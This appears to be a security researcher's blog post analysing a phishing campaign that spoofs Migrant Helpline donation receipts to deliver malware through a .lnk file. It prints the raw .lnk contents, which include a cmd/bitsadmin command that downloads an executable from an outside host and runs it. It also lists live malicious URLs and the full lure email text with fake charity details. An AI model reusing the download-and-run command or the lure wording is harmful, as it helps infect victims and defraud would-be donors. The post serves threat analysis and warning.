Spoofed Migrant Helpline Donations Delivers Malware

caution malware

I was forwarded this email by a contact, who can’t get the payload. I can’t either but hopefully one of my contacts can

The email just has an image as the body content :

migrant helpline

Link goes to http://<random characters>.fastfashun.com/thank-you-for-donation-reference.pdf

Examples http://uolarjs.fastfashun.com/thank-you-for-donation-reference.pdf http://bxbpmbhrc.fastfashun.com/thank-you-for-donation-reference.pdf

Which redirects to https://donation.yeshivadonations.com/thank-you-for-donation-reference.lnk I can download the lnk file but cannot get any payload from the site inside the file http://gerdamen.info/cass/cars/moto which gives me a 403 forbidden. I don’t know if it requires a referrer from the link or will only accept bits as a user agent. Trying to run it through Payload Security I get told it is a 64 bit file which will not run on a32 bit system ( Cannot run a 64-bit native file on a 32-bit virtual machine )

L  À Fû  ÷¶4‡+‰Ë÷¶4‡+‰ËX7‡+‰Ë D /  ) PàOÐ ê:i¢Ø +00 /C:\ R 1 ‘JP@ Windows <   ï¾î:…’JP@* $  W i n d o w s  V 1 (Jv8 System32 >   ï¾î:†(Jv8* ä  S y s t e m 3 2  R 2 D u=ü cmd.exe <   ï¾u=üu=ü* YÌ  c m d . e x e  S    6 R   ~q¡B Windows 7 C:\Windows\System32\cmd.exe * . . \ . . \ . . \ . . \ . . \ . . \ W i n d o w s \ S y s t e m 3 2 \ c m d . e x e  C : \ W i n d o w s \ s y s t e m 3 2 … / c e x p l o r e r . e x e & b i t s a d m i n . e x e / t r a n s f e r d / p r i o r i t y h i g h h t t p : / / g e r d a m e n . i n f o / c a s s / c a r s / m o t o % A p p D a t a % \ m o t o . e x e & % A p p D a t a % \ m o t o . e x e ! % S y s t e m R o o t % \ s y s t e m 3 2 \ S H E L L 3 2 . d l l ø ¥ 1SPS0ñ%·ïG¥ñ`Œžë¬!
  c m d . e x e )   A p p l i c a t i o n   @ n~‡+‰Ë  D   @ n~‡+‰Ë ‰ 1SPSâŠXF¼L8C»ü“&˜mÎm   . S – 1 – 5 – 2 1 – 2 0 6 1 4 4 2 2 4 7 – 5 9 8 7 7 0 0 5 1 – 3 3 4 4 0 4 6 4 4 6 – 1 0 0 0 Y 1SPSí0½ÚC ‰G§øФsf”= d   S y s t e m 3 2 ( C : \ W i n d o w s ) e 1SPS¦jc(=•ÒµÖ ÀOÙÐI    C : \ W i n d o w s \ S y s t e m 3 2 \ c m d . e x e   % Õ  wNÁç]N·D.±®Q˜·Õ `  X windows-t5vm49e šî°20K£í<‘xɹ\ŠýÆÔæ°‰ )Í}Ԛ20K£í<‘xɹ\ŠýÆÔæ°‰ )Í}Ô

VirusTotal report on link file

That is as far as I can get. Lets see what the real experts can do.

Update: I have received additional emails now with slightly different content in them;

From: noreply@yeshivadonations.com

Date: 9 January 2017 at 11:09:08 GMT

Subject: Thank you for choosing to donate to Migrant Helpline

Thank you for giving a much-needed donation of £361 to help families affected by the terrifying violence in Syria. With so many people who need our support, your gift is vital and greatly appreciated. Email not displaying correctly?
Thanks again for donating
We’re sending it straight to Migrant Helpline so you’ll be making a difference very soon.
Your donation details: First name: Last name: Tel. Amount: £361 Donation Reference: 47173243 If you have any questions about your donation, please follow this link and download Your (Donation Reference 47173243), with the transaction details listed above. With your help, YeshivaDonations can continue to work in Syria and neighbouring countries to deliver clean water and life-saving supplies to millions of people. Thank you again for your support. Your generosity is bringing much-needed assistance to families who have lost everything as a result of the crisis in Syria. Warm regards, YeshivaDonations

YeshivaDonations works with others to overcome poverty and suffering. YeshivaDonations GB is a member of YeshivaDonations International. YeshivaDonations is a registered charity in England and Wales (no 460744) and Scotland (SCO 945744) and a company limited by guarantee registered in England No 633693 at YeshivaDonations House, John Smith Drive, DL10 Whitwell. Registered Charity No. 738020. Tel: 76209829767.

This e-mail and any attachments are confidential and intended solely for the addressee and may also be privileged or exempt from disclosure under applicable law. If you are not the addressee, or have received this e-mail in error, please notify the sender immediately, delete it from your system and do not copy, disclose or otherwise act upon any part of this e-mail or its attachments.

Internet communications are not guaranteed to be secure or virus-free. The Barclays Group does not accept responsibility for any loss arising from unauthorised access to, or interference with, any Internet communications by any third party, or from the transmission of any viruses. Replies to this e-mail may be monitored by the Barclays Group for operational or business reasons.

Any opinion or other information in this e-mail or its attachments that does not relate to the business of the Barclays Group is personal to the sender and is not given or endorsed by the Barclays Group.

Barclays Bank PLC. Registered in England and Wales (registered no. 1026167). Registered Office: 1 Churchill Place, London, E14 5HP, United Kingdom. Barclays Bank PLC is authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority (Financial Services Register No. 122702).

The link in this email goes to http://donation62453.crypid.com/Sonia-thank-you-for-donation-reference-47173243.pdf but still downloads the same link file from https://donation.yeshivadonations.com/thank-you-for-donation-reference.lnk


There is no YeshivaDonations GB listed with the Charity Commission. None of the charity numbers listed in the emails exist or belong to any known Charity in UK